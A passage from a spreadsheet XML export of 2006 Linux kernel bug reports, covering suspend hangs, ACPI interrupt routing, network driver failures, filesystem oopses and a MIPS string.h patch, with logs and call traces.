    <t>2006-01-26 02:45 UTC</t>
  </si>
  <si>
    <t>Markus Walser</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: ? Distribution: *SuSE 10 Hardware Environment: *nx6125 *PCI: http://homepage.hispeed.ch/hb9xcg/lspci *CPU: AMD Turion(tm) 64 Mobile ML-34 stepping: 2 Software Environment: *gcc version 4.0.2 20050901 (prerelease) (SUSE Linux) *Config: http://homepage.hispeed.ch/hb9xcg/config-2.6.16-rc1-mm3 *SystemMap: http://homepage.hispeed.ch/hb9xcg/System.map-2.6.16-rc1-mm3-mw *dmesg: http://homepage.hispeed.ch/hb9xcg/resume-2.6.16-rc1-mm3.log Problem Description: During suspend to disk the system hangs for a while and reports after a few moments a callstack: http://homepage.hispeed.ch/hb9xcg/img_0410.jpg After the callstack suspend to disk completes and can even be resumed. Steps to reproduce: 1) boot in single user mode 2) enable the swap partition, 3) echo 4 &gt; /proc/acpi/sleep May be irrelevant, but during normal operation I get also this messages in the kernel log: " osl-0822 [77] os_wait_semaphore : Failed to acquire semaphore[ffff81005733ad40|1|0], AE_TIME" On the SuSE kernel 2.6.13-15.7-default, this message appears as well. Especially when accessing the proc fs by f.e. "cat /proc/acpi/thermal_zone/TZ1/temperature" after accessing the proc kacpi spins up to 100% cpu usage for a while. This may be connected to http://bugzilla.kernel.org/show_bug.cgi?id=5534</t>
  </si>
  <si>
    <t>irq 10: nobody cared - Thinkpad 600E</t>
  </si>
  <si>
    <t>2006-01-26 09:57 UTC</t>
  </si>
  <si>
    <t>2007-03-10 21:30 UTC</t>
  </si>
  <si>
    <t>This laptop has a BIOS from 1999 that has not often run ACPI due to the traditional blacklist date. However, some have deleted the blacklist date, exposing an ACPI failure. It appears that the PCI Interupt Link Devices are are reading 0 from the underlying PIIX4 PIRQx Route Control Registers. Futher, it appears that writes to those registers have no effect. eg. for LNKA: ACPI: PCI Interrupt Link [LNKA] (IRQs 3 4 5 6 7 9 10 11 12 14 15) *0, disabled. ACPI: PCI Interrupt Link [LNKA] disabled and referenced, BIOS bug. ACPI: PCI Interrupt Link [LNKA] BIOS reported IRQ 0, using IRQ 9 ACPI: PCI Interrupt Link [LNKA] enabled at IRQ 9 But instrumentation from a modified DSDT shows that the register is 0 both before and after writing 9 to it.</t>
  </si>
  <si>
    <t>WoL checking code in sis900_probe() is wrong</t>
  </si>
  <si>
    <t>2006-01-29 09:52 UTC</t>
  </si>
  <si>
    <t>2006-02-25 01:43 UTC</t>
  </si>
  <si>
    <t>+ /* Detect Wake on Lan support */ + ret = inl(CFGPMC &amp; PMESP); should be ret = (inl(net_dev-&gt;base_addr + CFGPMC) &amp; PMESP) &gt;&gt; 27 Found by Lennert Buytenhek.</t>
  </si>
  <si>
    <t>memscan</t>
  </si>
  <si>
    <t>2.6x 2.4x</t>
  </si>
  <si>
    <t>2006-01-30 14:16 UTC</t>
  </si>
  <si>
    <t>Bob Knight</t>
  </si>
  <si>
    <t>2006-01-31 09:06 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Hardware Environment: Software Environment:mips Problem Description: memscan inline asm macro in string.h returned incorrect value. Steps to reproduce: --- a/include/asm-mips/string.h 2006-01-14 22:16:02.000000000 -0800 +++ b/include/asm-mips/string.h 2006-01-30 13:54:13.000000000 -0800 @@ -151,11 +151,11 @@ __asm__(".set\tpush\n\t" ".set\tnoat\n\t" ".set\treorder\n\t" - "1:\tbeq\t%0,%1,2f\n\t" - "addiu\t%0,1\n\t" - "lbu\t$1,-1(%0)\n\t" - "bne\t$1,%z4,1b\n" - "2:\t.set\tpop" + "1:lbu\t$1,(%0)\n\t" + "beq\t$1,%z4,2f\n" + "addiu\t%0,1\n\t" + "bne\t%0,%1,1b\n\t" + "2:\t.set\tpop" : "=r" (__addr), "=r" (__end) : "0" (__addr), "1" (__end), "Jr" (__uc));</t>
  </si>
  <si>
    <t>speaker/headphone output selection hda/Sigmatel STAC9200</t>
  </si>
  <si>
    <t>2.6.15 and 2.6.16-rc1</t>
  </si>
  <si>
    <t>2006-01-31 09:58 UTC</t>
  </si>
  <si>
    <t>Carl Michal</t>
  </si>
  <si>
    <t>2007-06-19 22:11 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: N/A Distribution: Gentoo Hardware Environment: Dell Inspiron 630M, intel hda/Sigmatel STAC9200 Software Environment: mplayer Problem Description: In 2.6.15, the laptop internal speakers don't mute when headphones are plugged in. In 2.6.16-rc1, the internal speakers are never on, but there is output on the headphone jack. Steps to reproduce:</t>
  </si>
  <si>
    <t>r8169 driver - no network connection, hang at shutdown</t>
  </si>
  <si>
    <t>2006-02-01 13:16 UTC</t>
  </si>
  <si>
    <t>Andrew Akehurst</t>
  </si>
  <si>
    <t>2008-09-24 13:05 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: None found yet, seems to affect all recent 2.6.x kernels on my system Distribution: Ubuntu (Breezy) Hardware Environment: Foxconn motherboard with r8169 integrated (gigabit ethernet version). lspci -vvv output supplied. Software Environment: Linux kernel 2.6.15.1 (with Ubuntu Breezy). Output from dmesg supplied. Problem Description: r8169 gets a bad MAC address. After that occurs, no network connectivity is possible. Attempting to use ifconfig to reconfigure the interface causes a hang. System also hangs at "deconfiguring network interfaces" phase of shutdown. Steps to reproduce: Boot my system. Networking simply doesn't work. More information: r8169 driver and Linux kernel 2.6.15.1 fails to work with my Realtek 8169 ethernet controller. This is the gigabit ethernet-capable embedded version which is integrated into a Foxconn 925A01-8EKRS2 motherboard. Whenever the system boots, the r8169 driver does not pick up the MAC address for the card; it reports the MAC addrress as being FF:FF:FF:FF:FF:FF. (I have also tried various 2.6.12, 2.6.13, 2.6.14 kernels with the same experience). My first thought was a broken chip, but this box has similar issues with other network cards which I'll mention later. When I run ifconfig, this reports: eth0 Link encap:Ethernet HWaddr FF:FF:FF:FF:FF:FF inet addr:192.168.0.9 Bcast:192.168.255.255 Mask:255.255.0.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:4294967290 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) Interrupt:21 Base address:0x4800 The IP address has been assigned statically in /etc/network/interfaces as I don't use DHCP (and I doubt DHCP would currently work anyway). If I try to use "ifconfig eth0 hw ether" to set the MAC address then ifconfig just hangs. I am unable to ping anywhere in my network or beyond the gateway, nor can I establish any network connections to any other machine. Given that there appears to be something wrong at the link layer, I wouldn't expect higher layer diagnostics to reveal much, but I figured it was worth a try. In addition, my system tends to hang at the "deconfiguring network interfaces" stage of system shutdown. I have tried building the r8169 module both with and without gigabit ethernet support and using MMIO versus PIO - no luck. From browsing around the web, some people suggest changing the Plug and Play OS setting in the BIOS, only my BIOS doesn't appear to have any such setting. The only option in the PNP area was to reset the ESCD data, so I tried this to see if that would help, but still the issue persisted. Some reports seemed to suggest an issue with IRQ assignment and ACPI, so I tried booting with kernel options including nolapic, acpi=off, acpi=noirq, pci=noacpi, pci=routeirq and various combinations of these. None of them worked (in fact nolapic hangs my system during boot-up). I include the output from lspci -vvv and dmesg so you can see what is happening. I also used Donald Becker's rtl8169-diag program, but that complained that "A recognized chip has been found, but it does not appear to exist in I/O space". Incidentally, I tried some known good 3Com and D-Link network cards in this machine (both with and without the Realtek enabled in the BIOS) and I couldn't get them to work either for similar reasons. If it were just the Realtek I might assume it was a defective chip, but the lack of ability to get any network card working on this machine suggests a deeper issue. I'm happy to try testing new patches or settings, but would appreciate some tips on what to do next. In all other respects my system is happy and stable, it just lacks a working network connection. Thanks in advance. Andrew</t>
  </si>
  <si>
    <t>usbhid driver disable the Mouse and keyboard</t>
  </si>
  <si>
    <t>2.6.15.2</t>
  </si>
  <si>
    <t>2006-02-02 08:39 UTC</t>
  </si>
  <si>
    <t>Raphael RIGNIER</t>
  </si>
  <si>
    <t>2006-02-07 02:49 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.12? Distribution: Debian SID Hardware Environment: USB only micro touwer PC (HP Du520) Intel P4 based machine. Problem Description: Hello! My PS2 mouse and Keyboard are plugged into a composite USB to PS2 Adator. When the kernel loads the usbhid driver, those input devices don't work anymore... Here is en extract of dmesg output : ------------------------------------------------------ usb 2-1: new low speed USB device using uhci_hcd and address 2 usbcore: registered new driver hiddev input: Composite USB PS2 Converter USB to PS2 Adaptor v1.09 as /class/input/input0 input: USB HID v1.10 Keyboard [Composite USB PS2 Converter USB to PS2 Adaptor v1.09] on usb-0 000:00:1d.1-1 input: Composite USB PS2 Converter USB to PS2 Adaptor v1.09 as /class/input/input1 input: USB HID v1.10 Mouse [Composite USB PS2 Converter USB to PS2 Adaptor v1.09] on usb-0000 :00:1d.1-1 usbcore: registered new driver usbhid drivers/usb/input/hid-core.c: v2.6:USB HID core driver --------------------------------------------------------- Steps to reproduce: Plug a compsite USB to ps2 adaptor in any usb port, plug PS2 mouse and Keyboard in it, and boot the PC.... I thought it was udev's fault, but same config with 2.6.12 kernel works just fine! Rapha</t>
  </si>
  <si>
    <t>oops on mount "kernel access of bad area, sig: 11 [#1]"</t>
  </si>
  <si>
    <t>2006-06-26 04:41 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: unknown Distribution: Ubuntu Hardware Environment: ppc32 Apple Mac mini Problem Description: After over 10 days of uptime, mounting and unmounting my external firewire hardddrive for backups, I got the following OOPs today when trying to mount the drive. I've seen problems where the cable gets bumped loose and I'll see something similar, however I have not been able to verify if the cable was secure when this occured. The mount command is still hung, but the box seems to be running fine. ieee1394: sbp2: aborting sbp2 command sd 0:0:0:0: command: cdb[0]=0x28: 28 00 09 27 c0 03 00 00 02 00 ieee1394: sbp2: aborting sbp2 command sd 0:0:0:0: command: cdb[0]=0x0: 00 00 00 00 00 00 Oops: kernel access of bad area, sig: 11 [#1] PREEMPT NIP: C0023FF8 LR: C0023FF8 SP: EFC0FEB0 REGS: efc0fe00 TRAP: 0300 Not tainted MSR: 00001032 EE: 0 PR: 0 FP: 0 ME: 1 IR/DR: 11 DAR: 00000000, DSISR: 40000000 TASK = c134b230[317] 'scsi_eh_0' THREAD: efc0e000 Last syscall: -1 GPR00: 00000000 EFC0FEB0 C134B230 00000001 C05BDE28 FFFFFFFF C0650000 C0664E84 GPR08: 00040000 00000001 C13DF400 EFC0E000 C0650000 00000000 00000000 00000000 GPR16: 00000000 C02EF5A0 C06070EC C0586F7C C06070EC C0586F7C C06070EC C0650000 GPR24: 00000003 C13EE204 C13EE268 00000001 00009032 00000000 C13EE1C0 C02EF440 NIP [c0023ff8] complete+0x28/0x90 LR [c0023ff8] complete+0x28/0x90 Call trace: [c02ef45c] scsi_eh_done+0x1c/0x30 [c03248b8] sbp2scsi_abort+0x158/0x170 [c02efbcc] scsi_send_eh_cmnd+0x10c/0x1a0 [c02efce8] scsi_eh_tur+0x88/0xe0 [c02f0930] scsi_error_handler+0x450/0xa10 [c00437e8] kthread+0x108/0x110 [c0007534] kernel_thread+0x44/0x60 note: scsi_eh_0[317] exited with preempt_count 1 Steps to reproduce: Not easily reproduced.</t>
  </si>
  <si>
    <t>quota + 2.6.15.1</t>
  </si>
  <si>
    <t>Linux version 2.6.15.1</t>
  </si>
  <si>
    <t>2006-02-03 03:27 UTC</t>
  </si>
  <si>
    <t>Nerijus Kislauskas</t>
  </si>
  <si>
    <t>2006-02-20 02:49 UTC</t>
  </si>
  <si>
    <t>Problem Description: We where testing our group quotas over ext3 file system. Kernel crashed after "quotaoff -ap" command (Segmentation fault) and whole system freezed, no responses from host. We had to reboot it. Distribution: Debian stable Hardware Environment: IBM eServer xSeries 346 + DS400 total storage Kernel configuration: CONFIG_XFS_QUOTA=y CONFIG_QUOTA=y CONFIG_QUOTACTL=y CONFIG_QFMT_V1=m CONFIG_QFMT_V2=m CONFIG_EXT3_FS=y Software Environment: quota, quotatools Here is a log from syslog: Feb 3 11:53:39 bedugnis kernel: ------------[ cut here ]------------ Feb 3 11:53:39 bedugnis kernel: kernel BUG at fs/dquot.c:423! Feb 3 11:53:39 bedugnis kernel: invalid operand: 0000 [#1] Feb 3 11:53:39 bedugnis kernel: SMP Feb 3 11:53:39 bedugnis kernel: Modules linked in: quota_v1 aic7xxx scsi_transport_spi qla2300 qla2xxx firmware_class scsi_transport_fc Feb 3 11:53:39 bedugnis kernel: CPU: 0 Feb 3 11:53:39 bedugnis kernel: EIP: 0060:[&lt;c016f167&gt;] Not tainted VLI Feb 3 11:53:39 bedugnis kernel: EFLAGS: 00010202 (2.6.15.1) Feb 3 11:53:39 bedugnis kernel: EIP is at invalidate_dquots+0x47/0xde Feb 3 11:53:39 bedugnis kernel: eax: 00000001 ebx: f18ff580 ecx: f18ff580 edx: ffff0001 Feb 3 11:53:39 bedugnis kernel: esi: d4aba100 edi: 00000001 ebp: f7474800 esp: c07d1eb8 Feb 3 11:53:39 bedugnis kernel: ds: 007b es: 007b ss: 0068 Feb 3 11:53:39 bedugnis kernel: Process quotaoff (pid: 3275, threadinfo=c07d0000 task=f771ea30) Feb 3 11:53:39 bedugnis kernel: Stack: f74748d0 00000001 00000004 f74748ac c0170750 f7474800 00000001 f7474800 Feb 3 11:53:39 bedugnis kernel: 00000001 00000004 00000000 00000000 f7474800 00800003 00000001 00000000 Feb 3 11:53:39 bedugnis kernel: c017192b f7474800 00000001 c0151eab ca5df000 c0243fdb f73d17a8 fffffff4 Feb 3 11:53:39 bedugnis kernel: Call Trace: Feb 3 11:53:39 bedugnis kernel: [&lt;c0170750&gt;] vfs_quota_off+0x8b/0x1f2 Feb 3 11:53:39 bedugnis kernel: [&lt;c017192b&gt;] do_quotactl+0x101/0x30b Feb 3 11:53:39 bedugnis kernel: [&lt;c0151eab&gt;] getname+0x5b/0x92 Feb 3 11:53:39 bedugnis kernel: [&lt;c0243fdb&gt;] _atomic_dec_and_lock+0x27/0x44 Feb 3 11:53:39 bedugnis kernel: [&lt;c015e4bf&gt;] mntput_no_expire+0x14/0x5f Feb 3 11:53:39 bedugnis kernel: [&lt;c014df2f&gt;] lookup_bdev+0x6d/0x7c Feb 3 11:53:39 bedugnis kernel: [&lt;c0171631&gt;] check_quotactl_valid+0x34/0x3a Feb 3 11:53:39 bedugnis kernel: [&lt;c0171bd2&gt;] sys_quotactl+0x9d/0xb5 Feb 3 11:53:39 bedugnis kernel: [&lt;c0102789&gt;] syscall_call+0x7/0xb Feb 3 11:53:39 bedugnis kernel: Code: 58 f8 8b 73 08 83 ee 08 3d 8c e3 3d c0 0f 84 a3 00 00 00 39 6b 44 0f 85 84 00 00 00 0f bf 43 58 39 f8 75 7c 8b 43 34 85 c0 74 08 &lt;0f&gt; 0b a7 01 3e ee 37 c0 8b 53 04 85 d2 74 18 8b 03 85 c0 89 02 Feb 3 12:17:30 bedugnis syslog-ng[2668]: syslog-ng version 1.6.5 starting cat /proc/modules: aic7xxx 139956 0 - Live 0xf8ac0000 scsi_transport_spi 23424 1 aic7xxx, Live 0xf8a37000 quota_v1 7424 10 - Live 0xf8831000 qla2300 128896 0 - Live 0xf8a72000 qla2xxx 121564 8 qla2300, Live 0xf8a53000 firmware_class 14080 1 qla2xxx, Live 0xf8837000 scsi_transport_fc 31360 1 qla2xxx, Live 0xf8816000</t>
  </si>
  <si>
    <t>openoffice.org crashes reiser4</t>
  </si>
  <si>
    <t>2.6.16-rc1-mm4</t>
  </si>
  <si>
    <t>2006-02-03 10:26 UTC</t>
  </si>
  <si>
    <t>Stefan Mayrhofer</t>
  </si>
  <si>
    <t>2006-04-11 22:40 UTC</t>
  </si>
  <si>
    <t>Alex Zarochentsev</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: gentoo Environment: gcc-3.4.5, glibc-2.3.6-r2, 2.6.16-rc1-mm4 x86_64 Mobile AMD Athlon(tm) 64 Processor 2800+ Problem Description: if i start openoffice.org 2.0 (from app-office/openoffice-bin-2.0.1 which is a 32bit app running on a 64bit kernel) the splash screen appears but the application hangs. this problem doesn't have anything to do with java. it seems that reiser4 couldn't handle something oo.o did at start. this is from dmesg: Kernel BUG at fs/reiser4/plugin/file/tail_conversion.c:29 invalid opcode: 0000 [1] PREEMPT last sysfs file: /class/net/eth1/ifindex CPU 0 Modules linked in: usbcore eth1394 Pid: 10184, comm: soffice.bin Tainted: P M 2.6.16-rc1-mm4 #1 RIP: 0010:[&lt;ffffffff801c8317&gt;] &lt;ffffffff801c8317&gt;{get_exclusive_access+31} RSP: 0018:ffff810007cfde78 EFLAGS: 00010282 RAX: ffff81001e4d6730 RBX: ffff810006415670 RCX: 00000000f3ab8000 RDX: 00000000f3ab7000 RSI: 0000000000000000 RDI: ffff810006415670 RBP: ffff81001e4d66c0 R08: 0000000000000000 R09: ffff810014dd5f40 R10: 0000000000000293 R11: 0000000000000293 R12: ffff810006415670 R13: ffff810007cfdf50 R14: 0000000000000001 R15: 0000000000000000 FS: 00002ab0122a5b00(0000) GS:ffffffff805f7000(0063) knlGS:00000000f66606c0 CS: 0010 DS: 002b ES: 002b CR0: 000000008005003b CR2: 00002ab012776000 CR3: 000000000cbe9000 CR4: 00000000000006e0 Process soffice.bin (pid: 10184, threadinfo ffff810007cfc000, task ffff810010dd9730) Stack: 00000000f3ab7000 ffffffff801c78b7 0000000000000000 ffff810014dd5f40 000000011de53440 000000000000bd18 0000000000000000 ffff810006415700 ffff810007cfdf50 00000000f3ab7000 Call Trace: &lt;ffffffff801c78b7&gt;{write_unix_file+753} &lt;ffffffff80168181&gt;{vfs_write+175} &lt;ffffffff801682d0&gt;{sys_write+69} &lt;ffffffff8011c0b4&gt;{cstar_do_call+27} Code: 0f 0b 68 78 71 45 80 c2 1d 00 48 89 df e8 9a 5a 25 00 c7 43 RIP &lt;ffffffff801c8317&gt;{get_exclusive_access+31} RSP &lt;ffff810007cfde78&gt; reiser4 isn't able to sync anymore after this incident, which means that nothing that is done in the file system gets written on the disk. i did a complete fsck with rebuilding both superblock and file system and the problem still persists. also i tried to enable the reiser4 debug option in kernel, but with this option enabled the kernel panics and stops working if i start openoffice.org. i doubt that this could be a hardware problem (at least i hope so) therefore i suspect something weird in my kernel. since energyman mentioned wine, i think the issue could have something to do with 32bit apps accessing a reiser4 storage using a 64bit kernel (switching between cpu's long mode and compatibility mode). see also this discussion: http://forums.gentoo.org/viewtopic-t-429854.html</t>
  </si>
  <si>
    <t>tcpdump causes kernel panic</t>
  </si>
  <si>
    <t>2006-02-04 09:33 UTC</t>
  </si>
  <si>
    <t>Donny Jekels</t>
  </si>
  <si>
    <t>2008-03-18 02:05 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: We have been experiencing kernel panic when we run tcpdump for a period longer then 2minutes. In addition why I started using tcpdump, as it casues the kernel to panic much faster then our application. Hardware Environment: Penguin altus 2100 dual core amd 64 bit processors x 2 8 gig of ram 3ware array with 2 luns presented to OS Software Environment: trading application written in c++ with mulitcast clients Problem Description: We have been experiencing kernel panic when we run tcpdump for a period longer then 2minutes. In addition why I started using tcpdump, as it casues the kernel to panic much faster then our application. At 1st I thought it had something to do with the 3ware array controller, but that runed out to not be the case, since I upgraded the latest firmware and driver for the controller. Second, I thought it might be the NIC deviec driver "tg3" and swapped out the NIC with an Intel card "e1000" and the prblme exibited itself again. This ruled out the nic driver. third, I went 1 ref level back on the motherboard BIOS with no luck. I searched google for "tcpdump + kernel panic" and all results leads to kernel patches. I have now built and treid 2.6.16-rc2 and though dmesg does not show the same errors anymore the kernel still panic around 5 minutes of running tcpdump. Steps to reproduce: run tcpdump flat out for about 3~5 minutes.</t>
  </si>
  <si>
    <t>Bug found in kernel 2.6.16 at make menuconfig</t>
  </si>
  <si>
    <t>2.6.16-rc2</t>
  </si>
  <si>
    <t>2006-02-05 10:59 UTC</t>
  </si>
  <si>
    <t>2006-08-03 13:50 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur:2.6.15.2 Distribution: Mandriva 2006 Hardware Environment: nforce 4 Ultra &amp; SLI Athlon 64 3200+, Athlon 64 x2 3800+ Software Environment: Mandriva 2006 - all packeges updated Problem Description: Kernel does not compile - bug found in Makefile Steps to reproduce: After make menuconfig and saving .kernelrelease contains more then the "kernelrelease": 2.6.16-rc2.8mdkcustom .file null .ident GCC:(GNU)4.0.2(4.0.2-1mdkforMandrivaLinuxrelease2006.0) .section .note.GNU-stack,,@progbits If I leave Makefile as it is, I receive the error(make: *** [include/linux/version.h] Error 2), and the kernel can not be compiled. I made the folowing modifications in Makefile: I deleted .kernelrelease from line 818 I deleted .config from line 911 and deleted everything from .kernelrelease except "2.6.16-rc2.8mdkcustom" and the kernel then compiles.</t>
  </si>
  <si>
    <t>Gabriel A. Devenyi</t>
  </si>
  <si>
    <t>gnome-volume-manager broke w/ 2.6.16-rc1</t>
  </si>
  <si>
    <t>2.6.16-rc1 +</t>
  </si>
  <si>
    <t>2006-02-06 12:03 UTC</t>
  </si>
  <si>
    <t>2006-02-22 12:57 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.15 Distribution: Ubuntu Breezy Hardware Environment: Apple Mac Mini Problem Description: Since 2.6.16-rc1, gnome-volume-manager has seemingly stopped working. It no longer seems to detect when devices (usb flash drive, usb ipod, firewire backup disk) are plugged in or ejected and does not create/remove desktop icons. From the kernel dmesg, it appears everything is fine. Devices are found and can be mounted, unmounted, ejected. However gnome-volume-manager no longer appears to see the state changes. It probably is a gnome-volume-manager issue, but since it sorta smells like user-land breakage, I figured I'd file a kernel bug. Another concern is that this might be related to the ppc -&gt; powerpc conversion. Steps to reproduce: 1) Build &amp; boot 2.6.16-rc1 or greater on a ppc32 Mac Mini. 2) After the desktop has come up, plug in a usb storage device 3) Note the device desktop icon is not created.</t>
  </si>
  <si>
    <t>Tim Dijkstra</t>
  </si>
  <si>
    <t>AML interpretation in 32-bit slack mode becomes unstable after some exceptions</t>
  </si>
  <si>
    <t>2006-02-08 05:37 UTC</t>
  </si>
  <si>
    <t>2.6.15.3</t>
  </si>
  <si>
    <t>Arno</t>
  </si>
  <si>
    <t>i8xx-tco watchdog not functionnal on ICH7</t>
  </si>
  <si>
    <t>2006-02-08 08:21 UTC</t>
  </si>
  <si>
    <t>Lo</t>
  </si>
  <si>
    <t>2006-10-25 04:16 UTC</t>
  </si>
  <si>
    <t>Wim Van Sebroeck</t>
  </si>
  <si>
    <t>Intel E7230 chipset (ICH7) 2.6.15 kernel (i8xx-tco in version 0.08 20050807) The module is loaded, I launch the small test program (see /usr/src/linux-xx/Documentation/watchdog/watchdog.txt (opens /dev/watchdog, writes in it in a loop). I then kill the program and the computer should reboot. But nothing occurs ... Same test with an Intel 845 (ICH4) and 865 (ICH5) works well. I suspect a change in the Intel spec for the watchdog. The specs for ICH7 are : document 307013-002 ftp://download.intel.com/design/chipsets/datashts/30701302.pdf spec update 307014-009 ftp://download.intel.com/design/chipsets/specupdt/30701409.pdf concerns : Intel</t>
  </si>
  <si>
    <t>2006-02-08 15:41 UTC</t>
  </si>
  <si>
    <t>Guy Jr. Wiltfang</t>
  </si>
  <si>
    <t>2007-07-19 14:08 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Debian 3.2 Etch GNU/Linux 2.6.15.3 Hardware Environment: 0000:00:00.0 Host bridge: Silicon Integrated Systems [SiS] 741/741GX/M741 Host (rev 03) 0000:00:01.0 PCI bridge: Silicon Integrated Systems [SiS]: Unknown device 0003 0000:00:02.0 ISA bridge: Silicon Integrated Systems [SiS] SiS963 [MuTIOL Media IO] (rev 25) 0000:00:02.1 SMBus: Silicon Integrated Systems [SiS]: Unknown device 0016 0000:00:02.5 IDE interface: Silicon Integrated Systems [SiS] 5513 [IDE] 0000:00:02.7 Multimedia audio controller: Silicon Integrated Systems [SiS] Sound Controller (rev a0) 0000:00:03.0 USB Controller: Silicon Integrated Systems [SiS] USB 1.0 Controller (rev 0f) 0000:00:03.1 USB Controller: Silicon Integrated Systems [SiS] USB 1.0 Controller (rev 0f) 0000:00:03.2 USB Controller: Silicon Integrated Systems [SiS] USB 2.0 Controller 0000:00:04.0 Ethernet controller: Silicon Integrated Systems [SiS] SiS900 PCI Fast Ethernet (rev 90) 0000:00:0a.0 PCI bridge: Digital Equipment Corporation DECchip 21152 (rev 01) 0000:01:00.0 VGA compatible controller: Silicon Integrated Systems [SiS] 661FX/M661FX/M661MX/741/M741/760/M760 PCI/AGP 0000:03:00.0 Ethernet controller: Digital Equipment Corporation DECchip 21142/43 (rev 30) 0000:03:04.0 Ethernet controller: Digital Equipment Corporation DECchip 21142/43 (rev 30) 0000:03:08.0 Ethernet controller: Digital Equipment Corporation DECchip 21142/43 (rev 30) 0000:03:0c.0 Ethernet controller: Digital Equipment Corporation DECchip 21142/43 (rev 30) Software Environment: Gnu C 4.0.3 Gnu make 3.81beta4 binutils 2.16.91 util-linux 2.12p mount 2.12p module-init-tools 3.2.2 e2fsprogs 1.39-WIP reiserfsprogs line reiser4progs line Linux C Library 2.3.5 Dynamic linker (ldd) 2.3.5 Procps 3.2.5 Net-tools 1.60 Console-tools 0.2.3 Sh-utils 5.2.1 udev 081 Problem Description: As soon as I fake me MAC address I am not able to either send nor receive packages over this interface. Steps to reproduce: /etc/init.d/chmac #!/bin/bash # # Set up random mac for eth0 # case "$1" in start) echo "Setting up random mac for eth0" ifconfig eth0 down macchanger -r eth0 ;; stop) echo "Setting up real mac for eth0" ifconfig eth0 down macchanger -m 00:11:5b:xx:xx:xx eth0 ;; *) echo "Usage: /etc/init.d/chmac {start|stop}" exit 1 ;; esac</t>
  </si>
  <si>
    <t>standby should disable video</t>
  </si>
  <si>
    <t>2.6.16-rc2-mm1 &gt;</t>
  </si>
  <si>
    <t>2006-02-08 23:39 UTC</t>
  </si>
  <si>
    <t>2007-03-07 23:53 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: gentoo 2005.1 || ubuntu breezy Hardware Environment: ASUS P5LD2-VM (i945g+Celeron D) Software Environment: Problem Description: If standby sleep mode is used monitor can't disabled it self becous it gat a video signall. On a black screen is alweys blinking cursor. There is no such issue on winxp.</t>
  </si>
  <si>
    <t>Documentation error in Documentation/kernel-parameters.txt</t>
  </si>
  <si>
    <t>2006-02-09 10:05 UTC</t>
  </si>
  <si>
    <t>Mario Lipinski</t>
  </si>
  <si>
    <t>2006-03-04 14:02 UTC</t>
  </si>
  <si>
    <t>There is a documentation error in the recent linux kernel. The docs state: lockd.udpport= [NFS] lockd.tcpport= [NFS] However it just works for me with appending "lockd.udpport=&lt;port&gt; lockd.tcpport=&lt;port&gt;"</t>
  </si>
  <si>
    <t>Unable to handle kernel paging request</t>
  </si>
  <si>
    <t>2.6.16-rc2-git1</t>
  </si>
  <si>
    <t>2006-02-09 11:36 UTC</t>
  </si>
  <si>
    <t>Jesper Juhl</t>
  </si>
  <si>
    <t>2006-02-15 14:28 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.16.rc2 Distribution: Slackware Linux Problem Description: Two Oopses at boot. System ran fine after the oopses happened and on following boots they did not happen again. Full oops output can be found below along with other hopefully relevant details. Steps to reproduce: Cannot reproduce. Hardware Environment: -----[ cat /proc/cpuinfo output ]----- processor : 0 vendor_id : AuthenticAMD cpu family : 15 model : 35 model name : AMD Athlon(tm) 64 X2 Dual Core Processor 4400+ stepping : 2 cpu MHz : 2200.644 cache size : 1024 KB physical id : 0 siblings : 2 core id : 0 cpu cores : 2 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt lm 3dnowext 3dnow pni lahf_lm cmp_legacy ts fid vid ttp bogomips : 4404.96 processor : 1 vendor_id : AuthenticAMD cpu family : 15 model : 35 model name : AMD Athlon(tm) 64 X2 Dual Core Processor 4400+ stepping : 2 cpu MHz : 2200.644 cache size : 1024 KB physical id : 0 siblings : 2 core id : 1 cpu cores : 2 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt lm 3dnowext 3dnow pni lahf_lm cmp_legacy ts fid vid ttp bogomips : 4399.57 -----[ cat /proc/meminfo output ]----- MemTotal: 2074952 kB MemFree: 1594292 kB Buffers: 24756 kB Cached: 255200 kB SwapCached: 0 kB Active: 233344 kB Inactive: 150976 kB HighTotal: 1179328 kB HighFree: 814428 kB LowTotal: 895624 kB LowFree: 779864 kB SwapTotal: 763076 kB SwapFree: 763076 kB Dirty: 48 kB Writeback: 0 kB Mapped: 155032 kB Slab: 81684 kB CommitLimit: 1800552 kB Committed_AS: 441912 kB PageTables: 1376 kB VmallocTotal: 114680 kB VmallocUsed: 6540 kB VmallocChunk: 106992 kB -----[ lspci -vvvx output ]----- 00:00.0 Host bridge: ALi Corporation M1695 K8 Northbridge [PCI Express and HyperTransport] Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Capabilities: [40] #08 [0060] Capabilities: [5c] #08 [a800] Capabilities: [68] #08 [9000] Capabilities: [74] #08 [8000] Capabilities: [7c] Message Signalled 